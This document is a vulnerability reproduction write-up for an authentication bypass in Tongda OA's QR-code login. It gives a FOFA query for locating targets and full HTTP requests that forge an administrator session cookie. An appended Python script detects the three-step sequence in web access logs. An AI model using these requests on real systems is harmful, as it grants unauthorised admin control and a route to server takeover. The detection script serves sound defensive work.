T10-31 Tongda OA (通达 OA) - PermissionAC
Vulnerability description:
An attacker can craft malicious requests to log in as the system administrator account and then upload malicious files from the back-end management interface to take control of the web server.
Website screenshot:
Network mapping:
FOFA query:
app.name="通达 OA"
Reproduction steps:
Obtain a code_uid
/ispirit/login_code.php
Verify the codeuid
/general/login_code_scan.php
POST body: codeuid={8E41DD10-C3C3-A664-2249-2A2B2DF23619}&source=pc&uid=1&type=confirm&username=admin
Replace the codeuid with the one obtained in the previous step; when the status field in the response is 1, the verification succeeded.
POST /general/login_code_scan.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
codeuid={8E41DD10-C3C3-A664-2249-2A2B2DF23619}&source=pc&uid=1&type=confirm&username=admin
Obtain a cookie
/ispirit/login_code_check.php?codeuid={EED2B9FE-F865-DCF1-0E8D-3326AE163F6D}
Replace the codeuid with the one verified in the previous step to obtain a cookie.
Log in to the system with the obtained cookie
Replace the cookie with the one obtained in the previous step to log in to the application.
GET /general/index.php?is_modify_pwd=1 HTTP/1.1
Host: your-ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2l86fav5r9d65gjcub1abh49n1;
Connection: close
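For detection, the three server-side steps above (login_code.php, login_code_scan.php, login_code_check.php) leave a recognisable trail in the web server access log. The following is an added example, not part of the original write-up: it walks a per-client state machine over constructed combined-format log lines and reports any client IP that completed all three steps in order within a short window. It assumes a legitimate QR login confirms the code from a second device, so one IP chaining the steps in seconds is treated as suspicious; the log lines, IPs and 60-second window are constructed values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (Apache combined format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2023:10:00:01 +0800] "GET /ispirit/login_code.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2023:10:00:02 +0800] "POST /general/login_code_scan.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2023:10:00:03 +0800] "GET /ispirit/login_code_check.php?codeuid={EED2B9FE-F865-DCF1-0E8D-3326AE163F6D} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2023:10:00:04 +0800] "GET /general/index.php?is_modify_pwd=1 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2023:10:05:00 +0800] "GET /ispirit/login_code.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2023:10:07:30 +0800] "GET /general/index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')

STEPS = (("GET", "/ispirit/login_code.php"),        # the three steps of the write-up, in order
         ("POST", "/general/login_code_scan.php"),
         ("GET", "/ispirit/login_code_check.php"))

def parse_line(line):
    """Extract client IP, timestamp, method and path (query string dropped); None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, url = m.groups()
    return (ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, url.split("?", 1)[0])

def find_bypass_sequences(log_text, window=timedelta(seconds=60)):
    """Return [(ip, first_step_time, last_step_time)] for every client IP that walked
    all three STEPS in order within `window` (heuristic: one device doing the whole chain)."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec[0]].append(rec)
    hits = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[1])
        stage, start = 0, None   # per-client state machine over STEPS
        for _, when, method, path in recs:
            if start is not None and when - start > window:
                stage, start = 0, None  # chain went stale; start over from this record
            if (method, path) == STEPS[stage]:
                start = start if start is not None else when
                stage += 1
                if stage == len(STEPS):
                    hits.append((ip, start, when))
                    stage, start = 0, None
    return hits
```

Only the query-string-free path is matched, so the codeuid value itself does not need to be known in advance; tuning the window to the deployment's real QR-login timing is left to the operator.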